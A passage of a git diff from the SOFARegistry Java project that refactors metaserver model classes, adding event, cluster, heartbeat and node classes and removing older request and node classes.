* @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = dataInfoId; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } - - /** - * Getter method for property dataOperator. - * - * @return property value of dataOperator - */ - public DataOperator getDataOperator() { - return dataOperator; - } - - /** - * Setter method for property dataOperator. - * - * @param dataOperator value to be assigned to property dataOperator - */ - public void setDataOperator(DataOperator dataOperator) { - this.dataOperator = dataOperator; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("NotifyProvideDataChange{"); - sb.append("dataInfoId='").append(dataInfoId).append('\''); - sb.append(", version=").append(version); - sb.append(", dataOperator=").append(dataOperator); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/ProvideData.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/ProvideData.java index 15955f64c..e72184be9 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/ProvideData.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/ProvideData.java @@ -17,96 +17,89 @@ package com.alipay.sofa.registry.common.model.metaserver; import com.alipay.sofa.registry.common.model.ServerDataBox; - import java.io.Serializable; +import org.apache.commons.lang.StringUtils; +import org.springframework.util.Assert; /** - * * @author shangyu.wh * @version $Id: ProvideData.java, v 0.1 2018-04-17 20:13 shangyu.wh Exp $ */ public class ProvideData implements Serializable { - private ServerDataBox provideData; + private final ServerDataBox provideData; - private String dataInfoId; + private final String dataInfoId; - private Long version; + private final Long version; - /** - * construtor - * @param provideData - * @param dataInfoId - * @param version - */ - public ProvideData(ServerDataBox provideData, String dataInfoId, Long version) { - this.provideData = provideData; - this.dataInfoId = dataInfoId; - this.version = version; - } - - /** - * Getter method for property provideData. - * - * @return property value of provideData - */ - public ServerDataBox getProvideData() { - return provideData; - } + /** + * construtor + * + * @param provideData + * @param dataInfoId + * @param version + */ + public ProvideData(ServerDataBox provideData, String dataInfoId, Long version) { + this.provideData = provideData; + this.dataInfoId = dataInfoId; + this.version = version; + } - /** - * Setter method for property provideData. - * - * @param provideData value to be assigned to property provideData - */ - public void setProvideData(ServerDataBox provideData) { - this.provideData = provideData; - } + /** + * Getter method for property provideData. + * + * @return property value of provideData + */ + public ServerDataBox getProvideData() { + return provideData; + } - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } + /** + * Getter method for property dataInfoId. + * + * @return property value of dataInfoId + */ + public String getDataInfoId() { + return dataInfoId; + } - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = dataInfoId; - } + /** + * Getter method for property version. + * + * @return property value of version + */ + public Long getVersion() { + return version; + } - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; + public static String toString(ProvideData provideData) { + if (provideData == null || provideData.getProvideData() == null) { + return null; } + return (String) provideData.getProvideData().getObject(); + } - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } + public static Boolean toBool(ProvideData provideData) { + String obj = ProvideData.toString(provideData); + Assert.isTrue( + StringUtils.equals("true", obj) || StringUtils.equals("false", obj), + String.format("provideDataKey: %s, value: %s toBool error.", provideData.dataInfoId, obj)); + return obj != null ? Boolean.parseBoolean(obj) : null; + } - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("ProvideData{"); - sb.append("provideData=").append(provideData); - sb.append(", dataInfoId='").append(dataInfoId).append('\''); - sb.append(", version=").append(version); - sb.append('}'); - return sb.toString(); - } + public static Integer toInteger(ProvideData provideData) { + String obj = ProvideData.toString(provideData); + return obj != null ? Integer.valueOf(obj) : null; + } -} \ No newline at end of file + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("ProvideData{"); + sb.append("provideData=").append(provideData); + sb.append(", dataInfoId='").append(dataInfoId).append('\''); + sb.append(", version=").append(version); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/ProvideDataChangeEvent.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/ProvideDataChangeEvent.java new file mode 100644 index 000000000..2a7c17eff --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/ProvideDataChangeEvent.java @@ -0,0 +1,89 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver; + +import com.alipay.sofa.registry.common.model.Node.NodeType; +import com.google.common.collect.Sets; +import java.io.Serializable; +import java.util.Collections; +import java.util.Set; + +/** + * @author shangyu.wh + * @version $Id: NotifyProvideDataChange.java, v 0.1 2018-04-18 15:18 shangyu.wh Exp $ + */ +public class ProvideDataChangeEvent implements Serializable { + + private final String dataInfoId; + + private final long version; + + private final Set nodeTypes; + + /** + * constructor + * + * @param dataInfoId + * @param version + */ + public ProvideDataChangeEvent(String dataInfoId, long version) { + this(dataInfoId, version, Sets.newHashSet(NodeType.SESSION)); + } + + public ProvideDataChangeEvent(String dataInfoId, long version, Set nodeTypes) { + this.dataInfoId = dataInfoId; + this.version = version; + this.nodeTypes = Collections.unmodifiableSet(nodeTypes); + } + + /** + * Getter method for property dataInfoId. + * + * @return property value of dataInfoId + */ + public String getDataInfoId() { + return dataInfoId; + } + + /** + * Getter method for property version. + * + * @return property value of version + */ + public long getVersion() { + return version; + } + + /** + * Getter method for property nodeType. + * + * @return property value of nodeType + */ + public Set getNodeTypes() { + return nodeTypes; + } + + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("NotifyProvideDataChange{"); + sb.append("dataInfoId='").append(dataInfoId).append('\''); + sb.append(", version=").append(version); + sb.append(", nodeTypes=").append(nodeTypes); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/ReNewNodesRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/ReNewNodesRequest.java deleted file mode 100644 index 50485e65c..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/ReNewNodesRequest.java +++ /dev/null @@ -1,77 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.metaserver; - -import com.alipay.sofa.registry.common.model.Node; - -import java.io.Serializable; - -/** - * - * @author shangyu.wh - * @version $Id: RenewNodesRequest.java, v 0.1 2018-03-30 19:51 shangyu.wh Exp $ - */ -public class ReNewNodesRequest implements Serializable { - - private int duration; - - private final T node; - - /** - * constructor - * @param node - */ - public ReNewNodesRequest(T node) { - this.node = node; - } - - /** - * Getter method for property duration. - * - * @return property value of duration - */ - public int getDuration() { - return duration; - } - - /** - * Setter method for property duration. - * - * @param duration value to be assigned to property duration - */ - public void setDuration(int duration) { - this.duration = duration; - } - - /** - * Getter method for property node. - * - * @return property value of node - */ - public T getNode() { - return node; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("ReNewNodesRequest{"); - sb.append("duration=").append(duration); - sb.append(", node=").append(node); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/SessionNode.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/SessionNode.java deleted file mode 100644 index d6beeaf67..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/SessionNode.java +++ /dev/null @@ -1,178 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.metaserver; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.store.URL; - -/** - * - * @author shangyu.wh - * @version $Id: SessionNodeRegister.java, v 0.1 2018-01-11 16:32 shangyu.wh Exp $ - */ -public class SessionNode implements Node { - - private URL nodeUrl; - - private String regionId; - - private String name; - - private NodeStatus nodeStatus; - - /** - * constructor - * @param nodeUrl - * @param regionId - */ - public SessionNode(URL nodeUrl, String regionId) { - this.nodeUrl = nodeUrl; - this.regionId = regionId; - this.nodeStatus = NodeStatus.INIT; - } - - @Override - public NodeType getNodeType() { - return NodeType.SESSION; - } - - @Override - public URL getNodeUrl() { - return nodeUrl; - } - - @Override - public boolean equals(Object o) { - if (this == o) { - return true; - } - if (!(o instanceof SessionNode)) { - return false; - } - - SessionNode that = (SessionNode) o; - - if (nodeStatus != null ? !nodeStatus.equals(that.nodeStatus) : that.nodeStatus != null) { - return false; - } - if (name != null ? !name.equals(that.name) : that.name != null) { - return false; - } - - if (regionId != null ? !regionId.equals(that.regionId) : that.regionId != null) { - return false; - } - - return nodeUrl != null ? (nodeUrl.getAddressString() != null ? nodeUrl.getAddressString() - .equals(that.nodeUrl.getAddressString()) : that.nodeUrl.getAddressString() != null) - : that.nodeUrl != null; - } - - /** - * Hash code int. - * - * @return the int - */ - @Override - public int hashCode() { - int result = name != null ? name.hashCode() : 0; - result = 31 * result + (regionId != null ? regionId.hashCode() : 0); - result = 31 * result + (nodeStatus != null ? nodeStatus.hashCode() : 0); - result = 31 - * result - + (nodeUrl != null ? (nodeUrl.getAddressString() != null ? nodeUrl - .getAddressString().hashCode() : 0) : 0); - return result; - } - - /** - * Setter method for property nodeUrl. - * - * @param nodeUrl value to be assigned to property nodeUrl - */ - public void setNodeUrl(URL nodeUrl) { - this.nodeUrl = nodeUrl; - } - - /** - * Getter method for property regionId. - * - * @return property value of regionId - */ - public String getRegionId() { - return regionId; - } - - /** - * Setter method for property regionId. - * - * @param regionId value to be assigned to property regionId - */ - public void setRegionId(String regionId) { - this.regionId = regionId; - } - - /** - * Getter method for property name. - * - * @return property value of name - */ - public String getName() { - return name; - } - - /** - * Setter method for property name. - * - * @param name value to be assigned to property name - */ - public void setName(String name) { - this.name = name; - } - - /** - * Getter method for property nodeStatus. - * - * @return property value of nodeStatus - */ - @Override - public NodeStatus getNodeStatus() { - return nodeStatus; - } - - /** - * Setter method for property nodeStatus. - * - * @param nodeStatus value to be assigned to property nodeStatus - */ - @Override - public void setNodeStatus(NodeStatus nodeStatus) { - this.nodeStatus = nodeStatus; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("SessionNode{"); - sb.append("nodeUrl=").append(nodeUrl); - sb.append(", regionId='").append(regionId).append('\''); - sb.append(", name='").append(name).append('\''); - sb.append(", nodeStatus=").append(nodeStatus); - sb.append('}'); - return sb.toString(); - } - -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/SlotTableChangeEvent.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/SlotTableChangeEvent.java new file mode 100644 index 000000000..32e343de0 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/SlotTableChangeEvent.java @@ -0,0 +1,41 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver; + +import java.io.Serializable; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-02 17:30 yuzhi.lyz Exp $ + */ +public final class SlotTableChangeEvent implements Serializable { + + private final long slotTableEpoch; + + public SlotTableChangeEvent(long slotTableEpoch) { + this.slotTableEpoch = slotTableEpoch; + } + + public long getSlotTableEpoch() { + return slotTableEpoch; + } + + @Override + public String toString() { + return "SlotTableChangeEvent{" + "slotTableEpoch=" + slotTableEpoch + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/StatusConfirmRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/StatusConfirmRequest.java deleted file mode 100644 index 4182f1e7a..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/StatusConfirmRequest.java +++ /dev/null @@ -1,89 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.metaserver; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.Node.NodeStatus; - -import java.io.Serializable; - -/** - * - * @author shangyu.wh - * @version $Id: StatusConfirmRequest.java, v 0.1 2018-03-24 17:13 shangyu.wh Exp $ - */ -public class StatusConfirmRequest implements Serializable { - - private T node; - - private NodeStatus nodeStatus; - - /** - * construtor - * @param node - * @param nodeStatus - */ - public StatusConfirmRequest(T node, NodeStatus nodeStatus) { - this.node = node; - this.nodeStatus = nodeStatus; - } - - /** - * Getter method for property node. - * - * @return property value of node - */ - public T getNode() { - return node; - } - - /** - * Setter method for property node. - * - * @param node value to be assigned to property node - */ - public void setNode(T node) { - this.node = node; - } - - /** - * Getter method for property nodeStatus. - * - * @return property value of nodeStatus - */ - public NodeStatus getNodeStatus() { - return nodeStatus; - } - - /** - * Setter method for property nodeStatus. - * - * @param nodeStatus value to be assigned to property nodeStatus - */ - public void setNodeStatus(NodeStatus nodeStatus) { - this.nodeStatus = nodeStatus; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("StatusConfirmRequest{"); - sb.append("node=").append(node); - sb.append(", nodeStatus=").append(nodeStatus); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/blacklist/RegistryForbiddenServerRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/blacklist/RegistryForbiddenServerRequest.java new file mode 100644 index 000000000..8309252fe --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/blacklist/RegistryForbiddenServerRequest.java @@ -0,0 +1,65 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.blacklist; + +import com.alipay.sofa.registry.common.model.metaserver.DataOperation; +import java.io.Serializable; + +/** + * @author chen.zhu + *

Mar 18, 2021 + */ +public class RegistryForbiddenServerRequest implements Serializable { + + private final DataOperation operation; + + private final String ip; + + /** + * Constructor. + * + * @param operation the operation + * @param ip the ip + */ + public RegistryForbiddenServerRequest(DataOperation operation, String ip) { + this.operation = operation; + this.ip = ip; + } + + /** + * Gets get operation. + * + * @return the get operation + */ + public DataOperation getOperation() { + return operation; + } + + /** + * Gets get ip. + * + * @return the get ip + */ + public String getIp() { + return ip; + } + + @Override + public String toString() { + return "ForbiddenServerRequest{" + "operation=" + operation + ", ip='" + ip + '\'' + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/cluster/Cluster.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/cluster/Cluster.java new file mode 100644 index 000000000..edc04669d --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/cluster/Cluster.java @@ -0,0 +1,40 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.cluster; + +import java.util.List; + +/** + * @author chen.zhu + *

Mar 09, 2021 + */ +public interface Cluster { + + /** + * Epoch long. + * + * @return the long + */ + long getEpoch(); + + /** + * Gets get cluster members. + * + * @return the get cluster members + */ + List getClusterMembers(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/cluster/VersionedList.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/cluster/VersionedList.java new file mode 100644 index 000000000..2057686d5 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/cluster/VersionedList.java @@ -0,0 +1,49 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.cluster; + +import java.io.Serializable; +import java.util.Collections; +import java.util.List; + +/** + * @author chen.zhu + *

Mar 09, 2021 + */ +public class VersionedList implements Cluster, Serializable { + + public static final VersionedList EMPTY = new VersionedList(-1L, Collections.EMPTY_LIST); + + private final long epoch; + + private final List members; + + public VersionedList(long epoch, List members) { + this.epoch = epoch; + this.members = members; + } + + @Override + public long getEpoch() { + return epoch; + } + + @Override + public List getClusterMembers() { + return members; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/inter/heartbeat/BaseHeartBeatResponse.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/inter/heartbeat/BaseHeartBeatResponse.java new file mode 100644 index 000000000..16b88abed --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/inter/heartbeat/BaseHeartBeatResponse.java @@ -0,0 +1,112 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.google.common.collect.Sets; +import java.io.Serializable; +import java.util.*; + +/** + * @author chen.zhu + *

Nov 27, 2020 + */ +public class BaseHeartBeatResponse implements Serializable { + + private final boolean heartbeatOnLeader; + + private final SlotTable slotTable; + + private final VersionedList metaNodes; + + private final VersionedList sessionNodes; + + private final String metaLeader; + + private final long metaLeaderEpoch; + + public BaseHeartBeatResponse(boolean heartbeatOnLeader, String metaLeader, long metaLeaderEpoch) { + this(heartbeatOnLeader, null, null, metaLeader, metaLeaderEpoch); + } + + public BaseHeartBeatResponse( + boolean heartbeatOnLeader, + VersionedList metaNodes, + SlotTable slotTable, + String metaLeader, + long metaLeaderEpoch) { + this(heartbeatOnLeader, metaNodes, slotTable, VersionedList.EMPTY, metaLeader, metaLeaderEpoch); + } + + public BaseHeartBeatResponse( + boolean heartbeatOnLeader, + VersionedList metaNodes, + SlotTable slotTable, + VersionedList sessionNodes, + String metaLeader, + long metaLeaderEpoch) { + this.heartbeatOnLeader = heartbeatOnLeader; + this.slotTable = slotTable; + this.metaNodes = metaNodes; + this.sessionNodes = sessionNodes; + this.metaLeader = metaLeader; + this.metaLeaderEpoch = metaLeaderEpoch; + } + + public SlotTable getSlotTable() { + return slotTable; + } + + public List getMetaNodes() { + return metaNodes.getClusterMembers(); + } + + public String getMetaLeader() { + return metaLeader; + } + + public long getMetaLeaderEpoch() { + return metaLeaderEpoch; + } + + public Map getSessionNodesMap() { + final Map m = new HashMap<>(sessionNodes.getClusterMembers().size()); + sessionNodes.getClusterMembers().forEach(s -> m.put(s.getIp(), s)); + return m; + } + + public Set getDataCentersFromMetaNodes() { + Set dcs = Sets.newHashSet(); + metaNodes.getClusterMembers().forEach(m -> dcs.add(m.getDataCenter())); + return dcs; + } + + public long getSessionServerEpoch() { + return sessionNodes.getEpoch(); + } + + public long getMetaServerEpoch() { + return metaNodes.getEpoch(); + } + + public boolean isHeartbeatOnLeader() { + return this.heartbeatOnLeader; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/inter/heartbeat/HeartbeatRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/inter/heartbeat/HeartbeatRequest.java new file mode 100644 index 000000000..c370d8419 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/inter/heartbeat/HeartbeatRequest.java @@ -0,0 +1,195 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import java.io.Serializable; +import java.util.Collections; +import java.util.List; + +/** + * @author shangyu.wh + * @version $Id: RenewNodesRequest.java, v 0.1 2018-03-30 19:51 shangyu.wh Exp $ + */ +public class HeartbeatRequest implements Serializable { + + private int duration; + + private final T node; + + private final long slotTableEpoch; + + private final String dataCenter; + + private final long timestamp; + + private final SlotConfig.SlotBasicInfo slotBasicInfo; + + private final List slotStatuses; + + private SlotTable slotTable; + + /** + * constructor + * + * @param node + * @param slotTableEpoch + */ + public HeartbeatRequest( + T node, + long slotTableEpoch, + String dataCenter, + long timestamp, + SlotConfig.SlotBasicInfo slotBasicInfo) { + this.node = node; + this.slotTableEpoch = slotTableEpoch; + this.dataCenter = dataCenter; + this.timestamp = timestamp; + this.slotBasicInfo = slotBasicInfo; + this.slotStatuses = Collections.EMPTY_LIST; + } + + /** + * constructor + * + * @param node + * @param slotTableEpoch + */ + public HeartbeatRequest( + T node, + long slotTableEpoch, + String dataCenter, + long timestamp, + SlotConfig.SlotBasicInfo slotBasicInfo, + final List slotStatuses) { + this.node = node; + this.slotTableEpoch = slotTableEpoch; + this.dataCenter = dataCenter; + this.timestamp = timestamp; + this.slotBasicInfo = slotBasicInfo; + this.slotStatuses = slotStatuses; + } + + /** + * Getter method for property duration. + * + * @return property value of duration + */ + public int getDuration() { + return duration; + } + + /** + * Setter method for property duration. + * + * @param duration value to be assigned to property duration + */ + public void setDuration(int duration) { + this.duration = duration; + } + + /** + * Getter method for property node. + * + * @return property value of node + */ + public T getNode() { + return node; + } + + /** + * Gets get data center. + * + * @return the get data center + */ + public String getDataCenter() { + return dataCenter; + } + + /** + * Gets get timestamp. + * + * @return the get timestamp + */ + public long getTimestamp() { + return timestamp; + } + + /** + * Gets get slot basic info. + * + * @return the get slot basic info + */ + public SlotConfig.SlotBasicInfo getSlotBasicInfo() { + return slotBasicInfo; + } + + /** + * Gets get slot table epoch. + * + * @return the get slot table epoch + */ + public long getSlotTableEpoch() { + return slotTableEpoch; + } + + /** + * Gets get slot status. + * + * @return the get slot status + */ + public List getSlotStatus() { + return slotStatuses; + } + + /** + * Gets get slot table. + * + * @return the get slot table + */ + public SlotTable getSlotTable() { + return slotTable; + } + + /** + * Sets set slot table. + * + * @param slotTable the slot table + * @return the set slot table + */ + public HeartbeatRequest setSlotTable(SlotTable slotTable) { + this.slotTable = slotTable; + return this; + } + + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("RenewNodesRequest{"); + sb.append("duration=").append(duration); + sb.append(", node=").append(node); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/AbstractNode.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/AbstractNode.java new file mode 100644 index 000000000..6ea2d2aa7 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/metaserver/nodes/AbstractNode.java @@ -0,0 +1,80 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.nodes; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.alipay.sofa.registry.util.StringFormatter; +import java.util.Objects; + +public abstract class AbstractNode implements Node { + protected final URL nodeUrl; + protected final String regionId; + protected final String dataCenter; + protected final String nodeName; + + protected AbstractNode(String dataCenter, URL nodeUrl, String regionId) { + ParaCheckUtil.checkNotNull(nodeUrl, "nodeURl"); + this.dataCenter = dataCenter; + this.nodeUrl = nodeUrl; + this.regionId = regionId; + this.nodeName = getIp(); + } + + public String getIp() { + return nodeUrl.getIpAddress(); + } + + @Override + public URL getNodeUrl() { + return nodeUrl; + } + + public String getRegionId() { + return regionId; + } + + public String getNodeName() { + return nodeName; + } + + public String getDataCenter() { + return dataCenter; + } + + public String getAddressString() { + return nodeUrl.getAddressString(); + } + + protected boolean equal(AbstractNode node) { + return Objects.equals(nodeName, node.nodeName) + && Objects.equals(regionId, node.regionId) + && Objects.equals(dataCenter, node.dataCenter) + && Objects.equals(getAddressString(), node.getAddressString()); + } + + protected int hash() { + return Objects.hash(nodeName, regionId, dataCenter, getAddressString()); + } + + @Override + public String toString() { + 